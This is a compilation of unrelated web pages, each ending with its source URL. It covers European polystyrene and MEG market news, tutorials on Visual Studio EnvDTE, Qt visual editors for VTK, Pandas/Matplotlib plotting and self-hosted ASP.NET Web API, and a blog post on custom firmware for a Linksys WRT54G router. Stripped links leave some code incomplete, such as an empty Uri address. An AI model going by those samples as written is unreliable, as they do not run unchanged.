Some observers had estimated the oversupply in the European PS market at something approaching 600,000 tonnes/year. "While these closures do not bring the market back into balance, they go a long way to help, and instead of running at 75-80% of capacity, the industry can now produce at 90%," a major PS producer commented on Thursday. Margins in the PS market have been very poor, and PS producers have taken extreme measures to stop the rot. PS prices remained flat in November, however, with even some downward pressure after slight erosion in November styrene. Net spot PS prices were reported at €1,250/tonne free delivered (FD) Northwest Europe (NWE).
http://www.icis.com/Articles/2006/11/09/1104873/europe-ps-output-cut-by-350000-tyr-since-2005.html
12 October 2011 14:48 [Source: ICIS news]

LONDON (ICIS)--The European October monoethylene glycol (MEG) contract price is now fully confirmed at €1,136/tonne ($1,556/tonne), up €31/tonne from September, a producer and a customer said on Wednesday.

"I have agreed … that they will invoice our contract MEG for October at an ECP (European contract price) of €1,136/tonne FD (free delivered) NWE (northwest Europe)."

The confirmation follows an initial agreement settled on 7 October. Producers have been targeting a higher figure and are focused on firm fundamentals. "Globally, the MEG market is balanced-to-short. We should be looking for global pricing," the producer said.

The state of demand is a concern for customers, who have avoided buying large spot quantities for fear of being caught with high-priced stock.

Additional reporting by Mark Victory

($1 = €0.73)
http://www.icis.com/Articles/2011/10/12/9499548/europe-october-meg-contract-confirmed-at-1136tonne-up-31tonne.html
Before we start with development, let's get familiar with the classes we will be using. We will be using some classes from the System.Reflection namespace and many classes from the EnvDTE namespace.

Let's start with the EnvDTE namespace. The object model in the EnvDTE namespace is called the Visual Studio .NET Automation Object Model. DTE stands for Development Tools Extensibility. The DTE object is the root object of this model, and the object model at this level looks simple and easy to understand. From now onwards it starts getting complicated. Each project item exposes a FileCodeModel, which describes the code elements in that item.

Develop Sample to read object model in a project

Now that we are aware of the various objects, let's start with developing a small sample. We are building on top of the code from the previous article, in which we studied the Solution object, the ProjectItems collection and the ProjectItem object. Let's add a tree view control to the UI. For each project item selected, we will add its Namespaces, Classes and Interfaces to the tree. Add the following code to the lstProjectItems_SelectedIndexChanged event in the WizardSampleUI.cs file. Also check the FileCodeModel property used on prjToLoad. We are using the CodeElements collection on this object. Inside the first for loop we are checking the type of each code element. The type of any code element is checked using the Kind property. This property is of the enum type vsCMElementClass, and the Kind property of the code element is compared with this enum. We are checking if the code element is a namespace declaration. Unfortunately I could not find any element that represents using statements, though the enum vsCMElementClass supports it. Let's move ahead. Once we confirm that the code element is a namespace, we cast it to the CodeNamespace type and use its Members property to access all the classes and interfaces declared in the namespace. The Members property returns a collection of CodeElements.
While looping through the namespace members, we check the Kind of each code element and populate the tree view with details of the code element using helper functions. These helper functions are similar to the loadProjectItemdata function. Different helper functions are used to populate data about a class, the functions in the class and the properties in the class. We have the Tag property of TreeNode to our benefit. This property can hold any object. We want to add functionality that enables the user to select a function/class/interface and open it in the code view pane. The user will select the node and double click on it. So while adding any TreeNode object we initialize its Tag property to the code element it represents. In the loadProjectItemdata function we have added the code:

TreeNode ndNameSpace = nsNodes.Nodes.Add(cdElement.FullName);
ndNameSpace.Tag = cdElement; // Tag will later be used to navigate to the project item.

Now let's add the double click event for the tree view, which navigates to the selected element when the user double clicks on any function, parameter or class in the tree view.

dte.ExecuteCommand

This is a very important and powerful method of the DTE object. This method expects a command which is a menu-operated command. E.g. to build the solution we go to the Build menu and select the Build Solution command. To execute the same command using dte.ExecuteCommand you provide the string parameter Build.BuildSolution. To get the list of all these commands, you can use the command window. E.g. in the command window you can start typing Edit and you will get context-sensitive help listing all the commands available for the Edit menu. In the same way you can find all the commands for main menus such as Build, Debug, Tools etc. The other parameter of dte.ExecuteCommand is a string of arguments. This is optional and specific to each command.

What we achieved?
We studied various objects of the VS.NET automation object model, along with different properties and methods of these objects. Using these objects we browsed through the code modules and projects. We created an explorer that is similar to the Class View explorer. We were introduced to the TextPoint object. This is an important object for navigating through the text window and manipulating the code. The next step would be to generate code.

Extending Your Working Environment in Visual Studio - Advanced

Building Data Access Helper Component for Microsoft SQL Server

Very, very good article! A very, very good article which was very useful to me (sorry, I am French). Best regards

Hi, very nice article. How do I get the list of controls in a Windows form and an ASP.NET web page using an add-in in VS2008?

Nice effort. It helps, but could you please tell me how I could search for all available commands using the command line? I'm not getting it right. Please help me out. Thanks anyway. Usman Afzal
http://www.c-sharpcorner.com/uploadfile/raviraj.bhalerao/extendingworkenv211292005000156am/extendingworkenv2.aspx
Much of the scientific and visualization software in the world today is designed to be constructed from two separate parts: a visual frontend and a solver backend. The solver backend specializes in solving a problem within a specific domain, and can be difficult to interact with, whereas the visual frontend replaces API interaction with quick-feedback graphical interaction that most end-users can use with ease. When we look around, we can find solver and visual editor designs in almost all software. A database application, for example, makes use of SQL statements to interact with database backends, while the user interface presents the data in a more human-readable form. Scene graph systems can be thought of as solver backends for 3D visualization and modeling systems. Objects from the scene graph can be represented in several ways in the frontend for the user to work and interact with. In principle the solver/visual editor paradigm is very similar to the model/view paradigm found in Qt. A model is a software object that can be interacted with using the API it exposes. Views are used to display model objects, and they help users to visually interact with the model. In this article, we will look at how we can make use of Qt to design efficient visual editors for solver backends. Solver systems exist for different problem domains. Let's take the 3D visualization domain, for example. VTK () is a solver system for visualization problems. With VTK, one can give visual meaning to several kinds of data. Similarly, there are solver systems for several other problem domains. QualNet () is a solver for problems in the network simulation world. Using QualNet, one can simulate complex networks. Most solver systems provide classes or simple C APIs to help construct problem scenarios, solve those scenarios, and to fetch the solution arrived at by the solver afterwards. 
A programmer can effectively make use of one or more classes in each of these categories to solve a problem and study the solution. As the solver system matures, it may become necessary to ensure that even non-programmers can make use of the solver. Sometimes even the programmers developing the solver system may require easy-to-use interfaces for working with it. This is where visual editors come in. Visual editors for solver backends provide a graphical way to perform the following tasks: While the visual editors used are typically specific to each solver system, we can identify some design patterns that can help when designing most solver systems. This article specifically deals with how we can effectively use Qt to implement problem objects, a problem canvas, property editors and output viewers—all key parts of a solver system's design. Problem objects in a solver system describe aspects of a problem. They may expose one or more configurable properties and events. A programmer would use the getter and setter functions associated with properties, and callbacks associated with events, to configure the object. In a visual editor, configurable properties are shown in a property editor, and events are either handled internally or exposed as scriptable routines in the frontend. Let's consider a real world example to understand problem objects better. Suppose we wanted to visualize a 3D cone in VTK. To do this, we would have to assemble a pipeline as shown in the diagram on the left. vtkConeSource, vtkPolyDataNormals, vtkPolyDataMapper, vtkActor, vtkRenderer and vtkRenderWindow are problem objects. They are connected to form a visualization pipeline which, when executed, produces the output as shown in the left-hand image below. vtkConeSource has some properties like Height, Resolution and BaseRadius which can be adjusted programmatically using the appropriate getter and setter functions to alter the output. 
For example, if we set the Resolution property to 6 in the above pipeline, we get output as shown in the right-hand image below. In a visual editor, we would want problem objects to be graphically configurable. To enable this, we would have to create some mechanisms to transparently query property names and change their values. Most solver systems may not provide mechanisms to let us query or change their problem objects, therefore we can either modify the solver system or wrap problem objects in another layer that provides such mechanisms. Modifying the solver system may not be a practical solution in most cases because that may involve re-engineering the solver backend or, worse still, we may not have access to the source code of the solver. Wrapping, on the other hand, is a more practical approach. Wrapping involves providing access to backend methods and objects via another layer. This layer could be a wrapper class. A wrapper class essentially manages another object. It provides means for accessing the methods on that class, and also ensures the "health" of the class at all times. The object that is wrapped is called a wrapped object, and its class is called a wrapped class. Here's a simple Qt 3-based wrapper class for vtkConeSource:

#include "vtkConeSource.h"

class ConeSourceWrapper
{
public:
    void setCenter(float x, float y, float z)
    {
        _vtkConeSource->SetCenter(x, y, z);
    }
    void getCenter(float &x, float &y, float &z) const
    {
        float v[3];
        _vtkConeSource->GetCenter(v);
        x = v[0];
        y = v[1];
        z = v[2];
    }
    /* Other properties ... */

protected:
    vtkConeSource* _vtkConeSource;
};

ConeSourceWrapper does two things: it manages the lifetime of the objects—each vtkConeSource object is constructed and destroyed along with its corresponding ConeSourceWrapper object—and it provides wrapper methods that are used to access methods within vtkConeSource.
Now, you might wonder why writing such classes is of any use, since all we have done so far is duplicate the getter and setter functions of vtkConeSource in the wrapper class. Let's take a look at a slightly modified version:

class ConeSourceWrapper : public QObject
{
    Q_OBJECT
    Q_PROPERTY(double Height READ getHeight WRITE setHeight)
    Q_PROPERTY(QValueList<QVariant> Center READ getCenter WRITE setCenter)

public:
    ConeSourceWrapper()  { _vtkConeSource = vtkConeSource::New(); }
    ~ConeSourceWrapper() { _vtkConeSource->Delete(); }

    void setCenter(const QValueList<QVariant> &val)
    {
        _vtkConeSource->SetCenter(val[0].toDouble(),
                                  val[1].toDouble(),
                                  val[2].toDouble());
    }

    const QValueList<QVariant> getCenter() const
    {
        QValueList<QVariant> ret;
        float v[3];
        _vtkConeSource->GetCenter(v);
        ret.append( QVariant(v[0]) );
        ret.append( QVariant(v[1]) );
        ret.append( QVariant(v[2]) );
        return ret;
    }

    /* Other properties ... */

protected:
    vtkConeSource* _vtkConeSource;
};

The following things have changed in the second version of the wrapper class: it is now derived from QObject, uses the Q_OBJECT macro, and declares its properties with Q_PROPERTY, so that QMetaObject can be used to query and modify property values by name at runtime. QMetaObject also provides mechanisms for querying the signals and slots exposed by Qt objects. In a visual editor environment, events are represented by signals and commands are represented by slots. By using Qt's meta-object system one can easily support events and commands; however, a complete description of this is beyond the scope of this article.

Problem objects are not just containers for properties, signals and slots. They may have custom behavioral patterns that need to be regularized, so that those patterns can be accessed transparently for all problem objects. For example, objects that take part in a VTK pipeline accept one or more inputs and produce one or more outputs. Each input and output path has a specific data type, and the output of one object can be used as the input to another object. Wrapper classes for VTK will therefore have to expose these connection paths, and the methods that perform connections, via a common interface.
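The idea of querying and setting properties by name, which Q_PROPERTY and QMetaObject give us in C++, is easiest to see in a small language-agnostic sketch. Here is one in Python rather than C++ (the ConeSource stand-in, its method names, and the wrapper's API are invented for illustration; the real backend object would be vtkConeSource):

```python
class ConeSource:
    """Stand-in for a backend object such as vtkConeSource."""
    def __init__(self):
        self._height = 1.0
        self._resolution = 8

    def set_height(self, h): self._height = h
    def get_height(self): return self._height
    def set_resolution(self, r): self._resolution = r
    def get_resolution(self): return self._resolution


class ConeSourceWrapper:
    """Wrapper that owns the backend object and exposes its
    properties by name, the way Q_PROPERTY/QMetaObject do."""
    _properties = {
        "Height": ("get_height", "set_height"),
        "Resolution": ("get_resolution", "set_resolution"),
    }

    def __init__(self):
        # lifetime of the wrapped object is managed by the wrapper
        self._wrapped = ConeSource()

    def property_names(self):
        return sorted(self._properties)

    def get_property(self, name):
        getter, _ = self._properties[name]
        return getattr(self._wrapped, getter)()

    def set_property(self, name, value):
        _, setter = self._properties[name]
        getattr(self._wrapped, setter)(value)


w = ConeSourceWrapper()
w.set_property("Resolution", 6)      # what a property editor would do
print(w.property_names())            # ['Height', 'Resolution']
print(w.get_property("Resolution"))  # 6
```

A generic property editor only ever calls property_names(), get_property() and set_property(), so it works with any wrapper, which is exactly the role the meta-object system plays in the Qt version.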
To ensure that all wrappers employ common mechanisms to make and break such connections, we need to ensure that all wrappers are derived from a single class that provides virtual functions to perform these tasks. Here is the code for one such wrapper class:

class CWrapper : public QObject
{
    Q_OBJECT
    Q_PROPERTY(QString Name READ name WRITE setName)

public:
    static bool link(CWrapper *output, int outLine,
                     CWrapper *input, int inLine,
                     QString *errorMsg=0);
    static bool unlink(CWrapper *output, int outLine,
                       CWrapper *input, int inLine,
                       QString *errorMsg=0);
    ...
    virtual int inputLinkCount() const;
    virtual CWrapperLinkDesc inputLinkDesc(int index) const;
    virtual int outputLinkCount() const;
    virtual CWrapperLinkDesc outputLinkDesc(int index) const;
    ...

public slots:
    void setName(const QString name);
    void removeInputLinks();
    void removeOutputLinks();
    void removeAllLinks();

protected:
    virtual bool hasInput(int index);
    virtual bool setInput(int index, const CWrapperLinkData &linkData);
    virtual bool removeInput(int index, const CWrapperLinkData &linkData);
    virtual bool getOutput(int index, CWrapperLinkData &output);
    virtual void setVtkObject(vtkObject* object);
    ...
    void addLink(CWrapperLink *link);
    void removeLink(CWrapperLink *link);
    ...
};

From the above code you can see that, if we make CWrapper the base class for all wrappers in the visual editor for creating and editing VTK pipelines, each subclass can reimplement the virtual functions to describe its own input and output connection paths. The link() and unlink() functions make use of these reimplementations to establish and break links between wrappers. Since CWrapper is a subclass of QObject, subclasses of CWrapper can provide transparent access to properties, too.

A problem canvas can be thought of as a surface on which problem objects can be placed, configured and connected together to create a problem scenario.
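To make the role of link() and unlink() concrete, here is a minimal sketch of typed ports with a static link check, in Python rather than Qt/C++ (all class, port and type names are invented for illustration):

```python
class Wrapper:
    """Minimal stand-in for CWrapper: named, typed input/output ports."""
    def __init__(self, name, inputs=None, outputs=None):
        self.name = name
        self.inputs = dict(inputs or {})    # port name -> expected data type
        self.outputs = dict(outputs or {})  # port name -> produced data type
        self.links = []                     # (out_port, destination, in_port)

    @staticmethod
    def link(src, out_port, dst, in_port):
        """Connect src.out_port -> dst.in_port if the data types agree."""
        if out_port not in src.outputs or in_port not in dst.inputs:
            return False                    # no such port: refuse the link
        if src.outputs[out_port] != dst.inputs[in_port]:
            return False                    # type mismatch: refuse the link
        src.links.append((out_port, dst, in_port))
        return True


cone = Wrapper("ConeSource", outputs={"output": "PolyData"})
mapper = Wrapper("PolyDataMapper", inputs={"input": "PolyData"},
                 outputs={"output": "Mapper"})
actor = Wrapper("Actor", inputs={"mapper": "Mapper"})

print(Wrapper.link(cone, "output", mapper, "input"))   # True
print(Wrapper.link(cone, "output", actor, "mapper"))   # False: wrong type
```

A canvas built on this scheme can refuse an invalid connection at the moment the user draws it, which is the point of routing every connection through one static check.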
A problem canvas should ideally let users place, move, connect and select problem objects, with visual feedback as they do so. The Graphics View framework in Qt 4.2 provides an excellent foundation for designing such modules: it lets us manage and interact with a large number of custom-made 2D graphical items, and it supports features such as zooming and rotation that help to visualize the items on a problem canvas.

In the previous section we saw that, by creating a framework class called CWrapper as a subclass of QObject, we were able to provide transparent access to properties and connections. Here, we will modify the architecture of CWrapper a little to make it more usable within the problem canvas. To provide the functionality of a problem canvas, CWrapperCanvas, the most natural class to derive from is QGraphicsScene. If we derived CWrapper from QGraphicsRectItem, we could place instances of CWrapper on the problem canvas. To represent connections, we would create a new class called CWrapperLink, a subclass of QGraphicsLineItem. The graphics scene, CWrapperCanvas, could then be shown in a QGraphicsView subclass.

With the above framework in place, all we need to do is create subclasses of CWrapper for each VTK class we want to support in the frontend. For the VTK pipeline explained in the previous section, we need to create six wrappers.

A property editor is a user interface component in the frontend that helps users configure the values of properties exposed by problem object wrappers. We would expect a property editor to show all the editable properties of the selected object and to offer an appropriate editing widget for each property type. The Qt Solutions kit comes with a robust "Property Browser" framework that can be used (almost off the shelf) as a property editor. If you do not have access to Qt Solutions, you can subclass QTreeWidget or QListWidget to create a simple property editor. A property editor typically shows all editable properties exposed by any QObject subclass and allows the user to edit them.
Optionally, it may also list the signals emitted by the QObject and provide a user interface for associating scripts with them. With Qt 4.3 you can make use of the QtScript module to associate JavaScript code with events.

An output viewer is a user interface component that shows the output of a process or the solution given by the solver. Some solvers have implicit output viewers; for example, VTK has vtkRenderWindow, which shows the visualized output. For solvers that do not have their own output viewers, we have to implement custom output viewing mechanisms. Output viewers are mostly specific to the solver, hence a complete description of them is beyond the scope of this article.

In this article, we have seen how easy it is to construct the building blocks for a framework that we can use to visualize problems and their solutions. Qt provides many of the user interface features to make this possible and, via its meta-object system, allows us to do this in an extensible way. Accompanying this article is the full source code for a complete working demo of a simple VTK pipeline editor. The code for the demo illustrates how the above principles can be used to create a visual editor for VTK. (The libraries you need can be obtained from.)
http://doc.trolltech.com/qq/qq22-visualeditors.html
Data visualization is a big part of data analysis and data science. In a nutshell, data visualization is a way to show complex data in a form that is graphical and easy to understand. This can be especially useful when trying to explore the data and get acquainted with it. Visuals such as plots and graphs can be very effective in clearly explaining data to various audiences. Here is a beginner's guide to data visualisation using Matplotlib from a Pandas dataframe.

Fundamental design principles

All great visuals follow three key principles: less is more, attract attention, and have impact. In other words, any feature or design you include in your plot to make it more attractive or pleasing should support the message that the plot is meant to get across, not distract from it.

Matplotlib and its architecture

Let's first learn about Matplotlib and its architecture. Matplotlib is one of the most widely used, if not the most popular, data visualization libraries in Python. Matplotlib tries to make basic things easy and hard things possible. You can generate plots, histograms, box plots, bar charts, line plots, scatterplots, etc., with just a few lines of code. Keep reading to see code examples.

Matplotlib's architecture is composed of three main layers: the back-end layer, the artist layer where much of the heavy lifting happens, and the scripting layer. The scripting layer is considered a lighter interface that simplifies common tasks and allows quick and easy generation of graphics and plots.

Import Matplotlib and Numpy

First import Matplotlib and Matplotlib's pyplot. Note that you need to have Numpy installed for Matplotlib to work. If you work in Jupyter Notebooks you will need to write %matplotlib inline for your Matplotlib graphs to be included in your notebook, next to the code.
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
%matplotlib inline

mpl.style.use('ggplot')

The Pandas Plot Function

Pandas has a built-in .plot() function as part of the DataFrame class. In order to use it comfortably you will need to know several key parameters:

kind — the type of plot you require: 'line', 'bar', 'barh', 'pie', 'scatter', 'kde', etc.
color — sets the color. It accepts an array of hex codes corresponding to each data series/column.
linestyle — allows you to select a line style: 'solid', 'dotted', 'dashed' (applies to line graphs only).
x — label or position, default None.
y — label, position or list of labels/positions, default None. Allows plotting of one column against another.
legend — a boolean value to display or hide the legend.
title — the string title of the plot.

These are fairly straightforward to use and we'll do some examples using .plot() later in the post.

Line plots in Pandas with Matplotlib

A line plot is a type of plot which displays information as a series of data points called 'markers' connected by straight line segments. It is a basic type of chart common in many fields. Use line plots when you have continuous data sets. These are best suited for trend-based visualizations of data over a period of time.

# Sample data for examples
# Manually creating a dataframe
# Source:
df = pd.DataFrame({
    'Year': ['1958','1963','1968','1973','1978','1983','1988',
             '1993','1998','2003','2008','2013','2018'],
    'Average population': [51652500, 53624900, 55213500, 56223000,
                           56178000, 56315000, 56916000, 57713000,
                           58474000, 59636000, 61823000, 64105000,
                           66436000]
})

The df.plot() or df.plot(kind='line') commands create a line graph, and the parameters passed in tell the function what data to use. While you don't need to pass in the parameter kind='line' to get a line plot, it is better to add it for the sake of clarity.
The first parameter, Year, will be plotted on the x-axis, and the second parameter, Average population, will be plotted on the y-axis.

df.plot(x='Year', y='Average population', kind='line')

If you want to have a title and labels for your graph you will need to specify them separately:

plt.title('text')
plt.ylabel('text')
plt.xlabel('text')

Calling plt.show() is required for your graph to be printed on screen. If you use Jupyter Notebooks and you have already run the line %matplotlib inline, your graph will show even without you running plt.show(), but it will print an unwanted text message as well. This is why it is better to run plt.show() regardless of the environment. When run, the output will be as follows:

Bar charts in Pandas with Matplotlib

A bar plot is a way of representing data where the length of the bars represents the magnitude/size of the feature/variable. Bar graphs usually represent numerical and categorical variables grouped in intervals. Bar plots are most effective when you are trying to visualize categorical data that has few categories. If we have too many categories then the bars will be very cluttered in the figure and hard to understand. They're nice for categorical data because you can easily see the difference between the categories based on the size of the bar.

Now let's create a dataframe for our bar chart:

Data = {'Country': ['United States','Singapore','Germany','United Kingdom','Japan'],
        'GDP_Per_Capita': [52591, 67110, 46426, 38749, 36030]}
df = pd.DataFrame(Data, columns=['Country','GDP_Per_Capita'])

To create a bar plot we will use df.plot() again. This time we can pass one of two arguments via the kind parameter in plot():

kind='bar' creates a vertical bar plot
kind='barh' creates a horizontal bar plot

Similarly, the df.plot() command for a bar chart requires three parameters: x values, y values and the type of plot.

df.plot(x='Country', y='GDP_Per_Capita', kind='bar')
plt.title('GDP Per Capita in international dollars')
plt.ylabel('GDP Per Capita')
plt.xlabel('Country')
plt.show()

Sometimes it is more practical to represent the data horizontally, especially if you need more room for labelling the bars.
In horizontal bar graphs, the y-axis is used for labelling, and the length of the bars on the x-axis corresponds to the magnitude of the variable being measured. As you will see, there is more room on the y-axis to label categorical variables. To get a horizontal bar chart you need to change the kind parameter in plot() to barh. You also need to enter the correct x and y labels, as they are now switched compared to the standard bar chart.

df.plot(x='Country', y='GDP_Per_Capita', kind='barh')
plt.title('GDP Per Capita in international dollars')
plt.ylabel('Country')
plt.xlabel('GDP Per Capita')
plt.show()

The df.plot() command allows for significant customisation. If you want to change the color of your graph you can pass in the color parameter in your plot() command. You can also remove the legend by passing legend=False and add a title using title='Your Title'.

df.plot(x='Country', y='GDP_Per_Capita', kind='barh',
        color='blue',
        title='GDP Per Capita in international dollars',
        legend=False)
plt.show()

Scatter plots in Pandas with Matplotlib

Scatterplots are a great way to visualize a relationship between two variables without the potential for getting a misleading trend line from a line graph. Just like with the above graphs, creating a scatterplot in Pandas with Matplotlib only requires a few lines of code, as shown below. Let's start by creating a dataframe for the scatter plot.

# Sample dataframe
# Source:
# Data for 2015
Data = {'Country': ['United States','Singapore','Germany','United Kingdom','Japan'],
        'GDP_Per_Capita': [52591, 67110, 46426, 38749, 36030],
        'Life_Expectancy': [79.24, 82.84, 80.84, 81.40, 83.62]
       }
df = pd.DataFrame(Data, columns=['Country','GDP_Per_Capita','Life_Expectancy'])

Now that you understand how the df.plot() command works, creating scatterplots is really easy. All you need to do is change the kind parameter to scatter.
df.plot(kind='scatter', x='GDP_Per_Capita', y='Life_Expectancy', color='red')
plt.title('GDP Per Capita and Life Expectancy')
plt.ylabel('Life Expectancy')
plt.xlabel('GDP Per Capita')
plt.show()

Pie charts in Pandas with Matplotlib

A pie chart is a circular graphic that displays numeric proportions by dividing a circle into proportional slices. You are most likely already familiar with pie charts as they are widely used. Let's use a pie chart to explore the proportion (percentage) of the population split by continent.

# Sample dataframe for pie chart
# Source:
df = pd.DataFrame({'population': [422535000, 38304000, 579024000, 738849000,
                                  4581757408, 1106, 1216130000]},
                  index=['South America', 'Oceania', 'North America', 'Europe',
                         'Asia', 'Antarctica', 'Africa'])

We can create pie charts in Matplotlib by passing the kind='pie' keyword in df.plot().

df.plot(kind='pie', y='population', figsize=(10, 10))
plt.title('Population by Continent')
plt.show()

Box plots in Pandas with Matplotlib

A box plot is a way of statistically representing the distribution of the data through five main dimensions:

- Minimum: The smallest number in the dataset.
- First quartile: The middle number between the minimum and the median.
- Second quartile (Median): The middle number of the (sorted) dataset.
- Third quartile: The middle number between the median and the maximum.
- Maximum: The highest number in the dataset.

For the box plot, we can use the same dataframe that we used earlier for the bar chart. To make a box plot, we can use the kind='box' parameter in the plot() method invoked on a pandas Series or DataFrame.

df.plot(kind='box', figsize=(8, 6))
plt.title('Box plot of GDP Per Capita')
plt.ylabel('GDP Per Capita in dollars')
plt.show()

Conclusion

We just learned five quick and easy data visualisations using Pandas with Matplotlib. I hope you enjoyed this post and learned something new and useful.
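As a quick cross-check of the five box-plot dimensions listed above, they can be computed without plotting anything, using only Python's standard library (the function name and the median-of-halves quartile rule are illustrative choices, not from the post; Matplotlib's default quartile method may differ slightly):

```python
from statistics import median

def five_number_summary(values):
    """Min, Q1, median, Q3, max - the five dimensions a box plot draws.
    Quartiles are medians of the lower/upper halves (median excluded
    when the count is odd)."""
    s = sorted(values)
    n = len(s)
    half = n // 2
    lower, upper = s[:half], s[half + (n % 2):]
    return s[0], median(lower), median(s), median(upper), s[-1]

# GDP per capita figures from the bar-chart example above
gdp = [52591, 67110, 46426, 38749, 36030]
print(five_number_summary(gdp))
# (36030, 37389.5, 46426, 59850.5, 67110)
```

Comparing these numbers against the whiskers and box edges in the plot is a good way to confirm you are reading the figure correctly.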
If you want to learn more about data visualisation using Pandas with Matplotlib, check out the Pandas.DataFrame.plot documentation.
https://re-thought.com/how-to-visualise-data-with-python/
"Web API", as the name suggests, is an API, and an API should not be coupled with any specific kind of application. An API is supposed to provide services without being coupled to its consumer application. There is a common misconception that to develop Web APIs we have to create an ASP.NET MVC application. In this article, we will develop an independent API which is not coupled with the ASP.NET MVC application type.

Web API is a framework for building HTTP services. The services it exposes can be consumed by a broad range of clients, including browsers and mobile devices. Web API is a feature of ASP.NET MVC 4. It is included with MVC 4 because of their similarities, but that doesn't mean you always have to create an ASP.NET MVC application to develop a Web API. You can use Web API in any number of applications. As far as the philosophy of service development is concerned, it's all about exposing a few service methods; we should not be bothered about the application type. An MVC application serves a particular purpose, where we have a consumer end as well. We should develop our services independent of their consumers.

In this example, we will develop a Web API through a console application. When developing Web API outside MVC, you need to reference the Web API assemblies in your project. The NuGet Package Manager is the easiest way to add the Web API assemblies to a non-ASP.NET project. Once installation is done, you are all set to develop your Web API outside MVC.

Start Visual Studio and select New Project from the Start page. Or, from the File menu, select New and then Project. On the Templates pane, under Visual C#, select Console Application. Enter a name for the project and click OK.

Add a file Product.cs to create a business model class. We will expose this business object through our Web API. Now, we need to add our Web API. Technically, a Web API is nothing but a Web API controller class. In order to add the controller, right-click on the project and select Add New Item.
In the Templates pane, select Installed Templates and expand the Visual C# node. Under Visual C#, select Web. Select Web API Controller Class. Enter a name for the class and click OK. Once you have added the controller, you will find the class with auto-generated code:

namespace WebAPISelfHost
{
    public class ProductsController : ApiController
    {
        // Auto-generated stubs for GET, POST, PUT and
        // DELETE requests appear here.
    }
}

In the above code the controller class has been derived from the ApiController class. This is the key class for Web API: if we want to expose a controller through the API, we have to derive the controller from the abstract class ApiController. There are also four auto-generated method stubs, related to the four REST verbs GET, POST, PUT and DELETE. Since Web API is REST-based, the framework provides the structure for REST-based web services.

In our example, we will develop a simple service for getting product details. So, remove the auto-generated code and implement a Web API method GetProductList:

namespace WebAPISelfHost
{
    public class ProductsController : ApiController
    {
        //[HttpGet]
        public List<Product> GetProductList()
        {
            List<Product> productLst = new List<Product>{
                new Product{ProductID="P01",ProductName="Pen",Quantity=10,Price=12},
                new Product{ProductID="P02",ProductName="Copy",Quantity=12,Price=20},
                new Product{ProductID="P03",ProductName="Pencil",Quantity=15,Price=22},
                new Product{ProductID="P04",ProductName="Eraser",Quantity=20,Price=27}
            };
            return productLst;
        }
    }
}

In our API, we are simply returning a list of products. Compile the code and build the project. Now our Web API is ready, and we need to host it. You can self-host a Web API in your own host process; here, we will self-host the Web API in the console application itself. Reference System.Web.Http.SelfHost.dll in the project. This library provides classes for the HTTP self-hosted service.
Open the file Program.cs and add the following namespaces:

using System.Web.Http;
using System.Web.Http.SelfHost;

Now, add the following code for self-hosting (the listener address shown is just an example):

static void Main(string[] args)
{
    var config = new HttpSelfHostConfiguration("http://localhost:8080");

    config.Routes.MapHttpRoute(
        "API Default", "api/{controller}/{id}",
        new { id = RouteParameter.Optional });

    using (HttpSelfHostServer server = new HttpSelfHostServer(config))
    {
        server.OpenAsync().Wait();
        Console.WriteLine("Press Enter to quit.");
        Console.ReadLine();
    }
}

In the above code, we have created an instance of HttpSelfHostConfiguration. The overloaded constructor of the class expects a Uri so that it can listen on a particular HTTP address. In the MapHttpRoute method we are defining the routing pattern of our API. Finally, we use the configuration in the HttpSelfHostServer; our Web API is hosted on the basis of the configuration we defined. Compile and run the project. Now our Web API is up and ready to serve.

Note: This application listens on the address passed to HttpSelfHostConfiguration. By default, listening at a particular HTTP address requires administrator privileges. When you run the application, therefore, you might get an error: "HTTP could not register URL". To avoid this error, run Visual Studio with elevated administrator permissions.

Now it's time to consume the Web API. Let's write a simple console application that calls the Web API. Add a new console application project to the solution. As our API returns a list of Product objects, we need to add a stub Product class so the returned type can be deserialized in our client code. Add the file Product.cs to the client application. Open the file Program.cs and add the following namespaces:

using System.Net;
using System.Net.Http;
using System.Runtime.Serialization.Json;
using System.Net.Http.Formatting;
using System.Net.Http.Headers;
using EventStore.Serialization;

Create an instance of the HttpClient class and set the base address to the listener URI of the Web API:

HttpClient client = new HttpClient();
client.BaseAddress = new Uri("");

Add the Accept header. Here we are using a feature of HTTP, and of Web API, called "content negotiation". Using this feature, a client can negotiate with the server about the format of the data it returns.
Here, we negotiate with the server for the JSON format:

// Add an Accept header for JSON format.
client.DefaultRequestHeaders.Accept.Add(
    new MediaTypeWithQualityHeaderValue("application/json"));

Use the HttpClient.GetAsync method to send a GET request to the Web API, providing the routing pattern:

// List all products.
HttpResponseMessage response = client.GetAsync("api/products").Result;

Use the ReadAsAsync method to deserialize the response. ReadAsAsync returns a Task that will yield an object of the specified type. The GetAsync and ReadAsAsync methods are both asynchronous: they return Task objects that represent the asynchronous operation, and getting the Result property blocks the thread until the operation completes.

if (response.IsSuccessStatusCode)
{
    // Parse the response body. Blocking!
    var products = response.Content.ReadAsAsync<IEnumerable<Product>>().Result;

Finally, print the data retrieved from the Web API:

    foreach (var p in products)
    {
        Console.WriteLine("{0}\t{1};\t{2}", p.ProductID, p.ProductName, p.Quantity);
        Console.ReadLine();
    }
}
else
{
    Console.WriteLine("{0} ({1})", (int)response.StatusCode, response.ReasonPhrase);
}

Build and run the application (the server application should be up). You should see the list of products printed as output.
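As an aside, the deserialization step that ReadAsAsync performs on the negotiated JSON body can be sketched in a few lines of stdlib Python (the sample payload below is invented to match the Product class above, not captured from a live server):

```python
import json

# What a GET api/products response body might look like after the
# server honours the "Accept: application/json" header
body = '''[
  {"ProductID": "P01", "ProductName": "Pen",  "Quantity": 10, "Price": 12},
  {"ProductID": "P02", "ProductName": "Copy", "Quantity": 12, "Price": 20}
]'''

products = json.loads(body)   # the ReadAsAsync step: text -> typed objects
for p in products:
    print("{}\t{}\t{}".format(p["ProductID"], p["ProductName"], p["Quantity"]))
```

The C# client does the same thing with static types: the JSON array is mapped onto IEnumerable<Product>, field by field, which is why the client needs its own stub Product class.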
https://www.codeproject.com/Articles/769671/Web-API-without-MVC
A number of SeattleWireless geeks and I have been working on getting a shell on the Linksys WRT54G access point. It is in fact running Linux 2.4.5 with a number of interesting bits in the filesystem (namely full iptables support, zebra, bridging, and even a Rendezvous responder). Of course, that's not nearly enough for me. I want NoCat running on this puppy (probably NoCatSplash or Cheshire first, NoCatAuth to follow) along with IP tunnels, maybe vtun, some monitoring code, and maybe even some mesh bits. Since their kernel apparently supports loadable modules, this is all entirely possible. Almost.

We're very close to getting a custom firmware on this puppy, but I'm currently stuck trying to compute a CRC value that the AP will accept (details are up on the SeattleWireless site). I've just sent this comment to Linksys. It probably won't amount to much, but you never know.

